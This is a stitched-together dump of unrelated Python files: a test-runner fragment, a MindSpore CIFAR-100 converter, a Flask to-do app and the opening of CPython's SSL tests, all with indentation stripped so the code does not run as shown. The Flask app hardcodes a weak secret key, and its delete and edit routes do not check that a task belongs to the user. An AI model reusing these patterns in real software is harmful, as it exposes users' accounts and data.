strPassed = str(self.passed)
strFailed = str(self.failed)
if useColor:
if self.passed:
strPassed = self.green + strPassed + self.nocolor
if self.failed:
strFailed = self.red + strFailed + self.nocolor
return '[%s/%s/%d/%d %s%s]' % (strPassed, strFailed, running, remaining, duration, names)
names = ''
charsAvailable = self.columns - self.statusPadding - len(format('', useColor=False))
testsToList = 0
while testsToList <= running:
canidateNames = ' ' + self.format_running(testsToList)
if len(canidateNames) <= charsAvailable:
names = canidateNames
else:
break
testsToList += 1
self.buffer += format(names)
def format_duration(self, elapsed):
elapsed = math.floor(elapsed)
seconds = elapsed % 60
elapsed = math.floor(elapsed / 60)
minutes = elapsed % 60
hours = math.floor(elapsed / 60)
ret = "%ds" % (seconds,)
if minutes or hours:
ret = "%dm%s" % (minutes, ret)
if hours:
ret = "%dh%s" % (hours, ret)
return ret
def format_running(self, max):
ret = ''
for i in range(max):
if i > 0:
ret += ', '
ret += self.running_list[i]
if len(self.running_list) > max:
if max > 0:
ret += ', '
ret += "..."
return ret
def show(self, line):
self.clear_status()
self.buffer += line + "\n"
self.show_status()
def flush(self):
sys.stdout.write(self.buffer)
self.buffer = ''
sys.stdout.flush()
# Lock access to an object with a lock
class Locked(object):
def __init__(self, value=None):
self.value = value
self.lock = threading.Lock()
def __enter__(self):
self.lock.acquire()
return self.value
def __exit__(self, e, x, c):
self.lock.release()
def copy(self):
with self as value:
return value.copy()
# Run a single test in a separate process
class TestProcess(object):
def __init__(self, runner, id, test, dir, run_dir):
self.runner = runner
self.id = id
self.name = id[0]
self.test = test
self.timeout = test.timeout() or runner.timeout
self.supervisor = None
self.process = None
self.dir = abspath(dir)
self.run_dir = abspath(run_dir) if run_dir else None
self.gracefull_kill = False
self.terminate_thread = None
def start(self):
try:
self.runner.tell(TestRunner.STARTED, self.id, self)
os.mkdir(self.dir)
if self.run_dir:
os.mkdir(self.run_dir)
with open(join(self.dir, "description"), 'w') as file:
file.write(str(self.test))
self.supervisor = threading.Thread(target=self.supervise, name="supervisor:" + self.name)
self.supervisor.daemon = True
self.supervisor.start()
except Exception:
raise
def run(self, write_pipe):
def recordSignal(signum, frame):
print('Ignored signal SIGINT')
signal.signal(signal.SIGINT, recordSignal) # avoiding a problem where signal.SIG_IGN would cause the test to never stop
sys.stdin.close()
redirect_fd_to_file(1, join(self.dir, "stdout"), tee=self.runner.verbose)
redirect_fd_to_file(2, join(self.dir, "stderr"), tee=self.runner.verbose)
os.chdir(self.run_dir or self.dir)
os.setpgrp()
with Timeout(self.timeout):
try:
self.test.run()
except TimeoutException:
write_pipe.send(TestRunner.TIMED_OUT)
except:
sys.stdout.write(traceback.format_exc() + '\n')
sys.stderr.write(str(sys.exc_info()[1]) + '\n')
write_pipe.send(TestRunner.FAILED)
else:
write_pipe.send(TestRunner.SUCCESS)
finally:
if self.run_dir:
for file in os.listdir(self.run_dir):
shutil.move(join(self.run_dir, file), join(self.dir, file))
os.rmdir(self.run_dir)
def write_fail_message(self, message):
with open(join(self.dir, "stderr"), 'a') as file:
file.write(message)
with open(join(self.dir, "fail_message"), 'a') as file:
file.write(message)
def tail_error(self):
with open(join(self.dir, "stderr")) as f:
lines = f.read().split('\n')[-10:]
if len(lines) < 10:
with open(join(self.dir, "stdout")) as f:
lines = f.read().split('\n')[-len(lines):] + lines
return '\n'.join(lines)
def supervise(self):
read_pipe, write_pipe = multiprocessing.Pipe(False)
self.process = multiprocessing.Process(target=self.run, args=[write_pipe], name="subprocess:" + self.name)
self.process.start()
self.process.join(self.timeout + 5)
if self.terminate_thread:
self.terminate_thread.join()
if self.gracefull_kill:
with open(join(self.dir, "killed"), "a") as file:
file.write("Test killed")
self.runner.tell(TestRunner.KILLED, self.id, self)
elif self.process.is_alive():
self.terminate()
self.terminate_thread.join()
self.write_fail_message("Test failed to exit after timeout of %d seconds" % self.timeout)
self.runner.tell(TestRunner.FAILED, self.id, self)
elif self.process.exitcode:
self.write_fail_message("Test exited abnormally with error code %d" % self.process.exitcode)
self.runner.tell(TestRunner.FAILED, self.id, self)
else:
try:
write_pipe.close()
status = read_pipe.recv()
except EOFError:
self.write_fail_message("Test did not fail, but"
" failed to report its success")
status = TestRunner.FAILED
else:
if status != TestRunner.SUCCESS:
with open(join(self.dir, "fail_message"), 'a') as file:
file.write('Failed')
self.runner.tell(status, self.id, self)
def join(self):
while self.supervisor.is_alive():
self.supervisor.join(1)
def terminate_thorough(self):
if not self.process:
return
pid = self.process.pid
self.process.terminate()
self.process.join(5)
for sig in [signal.SIGTERM, signal.SIGABRT, signal.SIGKILL]:
try:
os.killpg(pid, sig)
except OSError:
break
time.sleep(2)
def terminate(self, gracefull_kill=False):
if gracefull_kill:
self.gracefull_kill = True
if self.terminate_thread:
return
self.terminate_thread = threading.Thread(target=self.terminate_thorough, name='terminate:' + self.name)
self.terminate_thread.start()
def pid(self):
return self.process.pid
class TimeoutException(Exception):
pass
# A scoped timeout for single-threaded processes
class Timeout(object):
def __init__(self, seconds):
self.timeout = seconds
def __enter__(self):
signal.signal(signal.SIGALRM, self.alarm)
signal.alarm(self.timeout)
def __exit__(self, type, exception, trace):
signal.alarm(0)
@staticmethod
def alarm(*ignored):
raise TimeoutException()
# A FilterSource describes what group a filter comes from
class FilterSource(object):
def __init__(self, group=None, weak=True):
self.group = group
self.weak = weak
def copy(self, weak=True):
return FilterSource(self.group, weak=weak)
def combined(self, other):
if self.weak:
return other
return self
def show(self, default='user input'):
if self.group:
return 'group ' + self.group
else:
return default
# A test filter that discriminates tests by name
class TestFilter(object):
INCLUDE = 'INCLUDE'
EXCLUDE = 'EXCLUDE'
def __init__(self, default=EXCLUDE, group=None):
self.default = default
self.tree = {}
self.was_matched = False
self.group = group
@classmethod
def parse(self, args, groups, group=None):
if not args:
return TestFilter(self.INCLUDE, group=FilterSource(group))
if args[0][0] == '!':
filter = TestFilter(self.INCLUDE, group=FilterSource(group))
else:
filter = TestFilter(self.EXCLUDE, group=FilterSource(group))
for arg in args:
if arg[0] == '!':
arg = arg[1:]
type = self.EXCLUDE
else:
type = self.INCLUDE
if arg in groups:
group = self.parse(groups[arg], groups, group=arg)
filter.combine(type, group)
else:
path = arg.split('.')
if path[-1] == '*':
path = path[:-1]
it = filter.at(path).reset(type)
return filter
def combine(self, type, other):
for name in set(self.tree.keys() + other.tree.keys()):
self.zoom(name, create=True).combine(type, other.zoom(name))
if other.default == self.INCLUDE:
self.default = type
self.group = self.group.combined(other.group)
def at(self, path):
if not path:
return self
else:
return self.zoom(path[0], create=True).at(path[1:])
def reset(self, type=EXCLUDE, weak=False):
self.group.weak = self.group.weak and weak
self.default = type
self.tree = {}
def match(self, test=None):
self.was_matched = True
return self.default == self.INCLUDE
def zoom(self, name, create=False):
try:
return self.tree[name]
except KeyError:
subfilter = TestFilter(self.default, group=self.group.copy())
if create:
self.tree[name] = subfilter
return subfilter
def check_use(self, path=[]):
if not self.was_matched:
message = 'No such test ' + '.'.join(path) + ' (from ' + self.group.show() + ')'
if self.group.group:
print('Warning: ' + message)
else:
raise Exception(message)
for name, filter in self.tree.items():
filter.check_use(path + [name])
def __repr__(self):
return ("TestFilter(" + self.default + ", " + repr(self.was_matched) +
", " + repr(self.tree) + ")")
def all_same(self):
self.was_matched = True
return not self.tree
# A test filter that discriminates using a predicate
class PredicateFilter(object):
def __init__(self, predicate):
self.predicate = predicate
def all_same(self):
return False
def match(self, test=None):
if test:
return self.predicate(test)
return True
def zoom(self, name):
return self
# A base class for tests or groups of tests
class Test(object):
def __init__(self, timeout=None):
self._timeout = timeout
def run(self):
raise Exception("run is not defined for the %s class" %
(type(self).__name__,))
def filter(self, filter):
if filter.match(self):
return self
else:
return None
def __iter__(self):
yield (None, self)
def timeout(self):
return self._timeout
def requirements(self):
return []
def configure(self, conf):
return self
# A simple test just runs a python function
class SimpleTest(Test):
def __init__(self, run, **kwargs):
Test.__init__(self, **kwargs)
self._run = run
def run(self):
self._run()
# A tree of named tests
class TestTree(Test):
def __init__(self, tests={}):
self.tests = dict(tests)
def filter(self, filter):
if filter.all_same():
if filter.match():
return self
else:
return TestTree()
trimmed = TestTree()
for name, test in self.tests.items():
subfilter = filter.zoom(name)
trimmed[name] = test.filter(subfilter)
return trimmed
def run(self):
for test in self.tests.values():
test.run()
def __getitem__(self, name):
return self.tests[name]
def __setitem__(self, name, test):
if not test or (isinstance(test, TestTree) and not test.tests):
try:
del(self.tests[name])
except KeyError:
pass
else:
self.tests[name] = test
def add(self, name, test):
if name in self.tests:
raise Exception('Test already exists: %s' % (name,))
self.tests[name] = test
def __iter__(self):
for name in sorted(self.tests.keys()):
for subname, test in self.tests[name]:
if subname:
yield (name + '.' + subname, test)
else:
yield name, test
def requirements(self):
for test in self.tests.values():
for req in test.requirements():
yield req
def configure(self, conf):
return TestTree({test: self.tests[test].configure(conf) for test in self.tests})
def __len__(self):
count = 0
for __, ___ in self:
count += 1
return count
def has_test(self, name):
return name in self.tests
# Used with `--load' to load old test results
def load_test_results_as_tests(path):
tests = TestTree()
for dir in os.listdir(path):
full_dir = join(path, dir)
if not os.path.isdir(full_dir):
continue
names = list(reversed(dir.split('.')))
parent = tests
while parent.has_test(names[-1]):
parent = parent[names[-1]]
names.pop()
test = OldTest(full_dir)
for name in names[:-1]:
test = TestTree({name: test})
parent[names[-1]] = test
return tests
# A test that has already run
class OldTest(Test):
def __init__(self, dir, **kwargs):
Test.__init__(self, **kwargs)
self.dir = dir
def __str__(self):
return self.read_file('description', 'unknown test')
def read_file(self, name, default=None):
try:
with open(join(self.dir, name)) as file:
return file.read()
except Exception as e:
# TODO: catch the right exception here
return default
def passed(self):
return not os.path.exists(join(self.dir, "fail_message"))
def killed(self):
return os.path.exists(join(self.dir, "killed"))
def dump_file(self, name):
with file(join(self.dir, name)) as f:
for line in f:
print(line, end=' ')
def dump_log(self):
self.dump_file("stdout")
self.dump_file("stderr")
print()
def list_files(self, glob=None, text_only=True):
for root, dirs, files in os.walk(self.dir):
for file in files:
name = relpath(join(root, file), self.dir)
if not glob or fnmatch.fnmatch(name, glob):
if not text_only or name == glob or utils.guess_is_text_file(join(root, file)):
yield name
def group_from_file(path):
patterns = []
with open(path) as f:
for line in f:
line = line.split('#')[0]
if line:
patterns += line.split()
return patterns
|
cifar100_to_mr.py
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar100 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar100 import Cifar100
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar100ToMR']
class Cifar100ToMR:
"""
A class to transform from cifar100 to MindRecord.
Args:
source (str): the cifar100 directory to be transformed.
destination (str): the MindRecord file path to transform into.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file == "train":
train_data_flag = True
if file == "test":
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("train")
if not test_data_flag:
raise PathNotExistsError("test")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Executes transformation from cifar100 to MindRecord.
Args:
fields (list[str]): A list of index field, e.g.["fine_label", "coarse_label"].
Returns:
SUCCESS or FAILED, whether cifar100 is successfully transformed to MindRecord.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar100_data = Cifar100(self.source, False)
cifar100_data.load_data()
images = cifar100_data.images
logger.info("train images: {}".format(images.shape))
fine_labels = cifar100_data.fine_labels
logger.info("train images fine label: {}".format(fine_labels.shape))
coarse_labels = cifar100_data.coarse_labels
logger.info("train images coarse label: {}".format(coarse_labels.shape))
test_images = cifar100_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_fine_labels = cifar100_data.Test.fine_labels
logger.info("test images fine label: {}".format(fine_labels.shape))
test_coarse_labels = cifar100_data.Test.coarse_labels
logger.info("test images coarse label: {}".format(coarse_labels.shape))
data_list = _construct_raw_data(images, fine_labels, coarse_labels)
test_data_list = _construct_raw_data(test_images, test_fine_labels, test_coarse_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
def _construct_raw_data(images, fine_labels, coarse_labels):
"""
Construct raw data from cifar100 data.
Args:
images (list): image list from cifar100.
fine_labels (list): fine label list from cifar100.
coarse_labels (list): coarse label list from cifar100.
Returns:
SUCCESS/FAILED, whether successfully written into MindRecord.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
raw_data = []
for i, img in enumerate(images):
fine_label = np.int(fine_labels[i][0])
coarse_label = np.int(coarse_labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"fine_label": int(fine_label),
"coarse_label": int(coarse_label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): Dict of raw data.
schema_desc (str): String of schema description.
Returns:
SUCCESS/FAILED, whether successfully written into MindRecord.
"""
schema = {"id": {"type": "int64"}, "fine_label": {"type": "int64"},
"coarse_label": {"type": "int64"}, "data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
app.py
|
# -*- coding:utf-8 -*-
import os
from threading import Thread
from flask import Flask, request
from flask import redirect, url_for
from flask import flash
from flask import render_template
from flask_login import login_user, LoginManager, login_required, logout_user, current_user
from flask_bootstrap import Bootstrap
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from flask_moment import Moment
from flask_mail import Mail, Message
from form import LoginForm, TaskForm, RegistrationForm
from models import db, User, Task
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER'] = 'smtp.126.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[TODOLIST]'
app.config['FLASKY_MAIL_SENDER'] = 'Daytodo-Admin<kidult1107@126.com>'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN') # Admin管理者邮箱
manager = Manager(app)
bootstrap = Bootstrap(app)
db.init_app(app)
migrate = Migrate(app, db)
moment = Moment(app)
mail = Mail(app)
login_manager = LoginManager(app)
login_manager.session_protection = 'strong'
login_manager.login_view = 'login'
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
# 无法使用这个,使用后会报错
# @app.before_request
# def before_request():
# if not current_user.confirmed:
# return redirect(url_for('unconfirmed'))
@app.route('/unconfirmed')
def unconfirmed():
if current_user.confirmed:
return redirect(url_for('index'))
return render_template('unconfirmed.html')
@app.route("/")
@login_required
def index():
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
# 使用current_user.id查询到对应的task,并使用模版渲染
tasks = Task.query.filter_by(user_id=current_user.id).all()
return render_template("index.html", tasks=tasks)
@app.route("/add", methods=["GET", "POST"])
@login_required
def add():
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
form = TaskForm()
if form.validate_on_submit():
task = Task(current_user.id, form.title.data, form.status.data)
db.session.add(task)
db.session.commit()
flash("Add one task.")
return redirect(url_for("index"))
return render_template("add.html", form=form)
@app.route("/delete/<int:article_id>")
@login_required
def delete(article_id):
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
task = Task.query.filter_by(id=article_id).first_or_404()
db.session.delete(task)
db.session.commit()
flash("Delete one task.")
return redirect(url_for("index"))
@app.route("/change/<int:article_id>", methods=["GET", "POST"])
@login_required
def change(article_id):
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
form = TaskForm()
task = Task.query.filter_by(id=article_id).first_or_404()
if form.validate_on_submit():
task.title = form.title.data
task.status = form.status.data
db.session.add(task)
db.session.commit()
return redirect(url_for("index"))
form.title.data = task.title
form.status.data = task.status
return render_template("modify.html", form=form)
@app.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(url_for("index"))
flash("Invalid email or password.")
return redirect(url_for("login")) # Post/重定向/Get模式,确保最后一个请求是get请求
return render_template('login.html', form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
flash("You had logout!!!")
return redirect(url_for("login"))
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('login'))
return render_template('register.html', form=form)
@app.route('/confirm/<token>')
#@login_required
def confirm(token):
if current_user.confirmed: # 有点疑问,从邮箱点击这个,此时有current_user这个信息吗?
return redirect(url_for('index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('index'))
@app.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('index'))
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
def make_shell_context():
return dict(app=app, db=db, User=User, Task=Task)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == "__main__":
manager.run()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
